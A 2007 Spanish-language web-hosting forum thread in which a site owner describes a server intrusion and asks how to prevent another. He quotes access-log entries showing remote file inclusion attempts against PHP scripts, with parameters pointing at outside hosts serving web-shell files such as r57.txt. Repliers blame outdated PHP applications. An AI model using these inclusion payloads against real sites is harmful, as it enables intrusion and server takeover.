Foros del Web » Administración de Sistemas » Cloud Computing »

Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder?

Estas en el tema de Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder? en el foro de Cloud Computing en Foros del Web. Hola, hace semanas NO entraba a mi cPanel... Accedi al PhpMyAdmin para ver unas cosas... Oh carambas!!, tengo IP dedicada para la conección!. Al acceder ...
  #1 (permalink)  
Antiguo 02/09/2007, 12:03
 
Fecha de Ingreso: febrero-2004
Mensajes: 1.987
Antigüedad: 20 años, 9 meses
Puntos: 22
Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder?

Hola,

hace semanas NO entraba a mi cPanel...

Accedi al PhpMyAdmin para ver unas cosas...

Oh carambas!!, tengo IP dedicada para la conección!.

Al acceder al cPanel veo que alguien ha agregado una IP a las conexiones REMOTAS de MySQL...

Busco en los LOGS de acceso y descubro que esa IP ha intentado acceder a mi web con vars como:
Código PHP:
coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http:  flackster.org photos myadmin temp ., ., ., r57.txt?

hosting  coin_includes constants.php?_CCFG[_PKG_PATH_INCL]=http:  flackster.org photos myadmin temp ., ., ., r57.txt?

/
phpPgAdmin/sqledit.php?server=http://members.lycos.nl/pspmusicfeed/id.txt?

/include/main.php?config[search_disp]=true&include_dir=http://usuarios.arnet.com.ar/larry123/safe.txt?

Etc... 
La IP es de KOREA...

Ademas os digo:

Núnca agrego Conex remotas a MySQL... (Y tengo IP FIJA para Internet)...

Es un BUG de PhpMyAdmin?
Es un BUG de cPanel?
Con exploits a PHP pueden haber agregado ESA IP a mi sistema ?

Que pesadilla!!!....
  #2 (permalink)  
Antiguo 03/09/2007, 03:13
Avatar de cincinnati  
Fecha de Ingreso: noviembre-2002
Ubicación: Cerca, muy cerca
Mensajes: 971
Antigüedad: 22 años
Puntos: 29
Re: Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder?

Cita:
Con exploits a PHP pueden haber agregado ESA IP a mi sistema
Sí, por supuesto. Explotando agujeros de php (tipo joomlas obsoletos, phpbb, oscommerce, etc, etc) no es muy complicado para un hacker acceder a tu sistema y hacer lo que quiera.
__________________
Be water my friend
  #3 (permalink)  
Antiguo 03/09/2007, 04:12
 
Fecha de Ingreso: agosto-2007
Mensajes: 665
Antigüedad: 17 años, 3 meses
Puntos: 4
Re: Han logrado meterse en mi SERVER, que puedo hacer para que no vuelva a suceder?

Me sucedio hace algún tiempo y fue por un módulo de joomla llamado ext_calendar; pero ellos no accedieron a mi cpanel y en tu caso al parecer si;
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 09:38.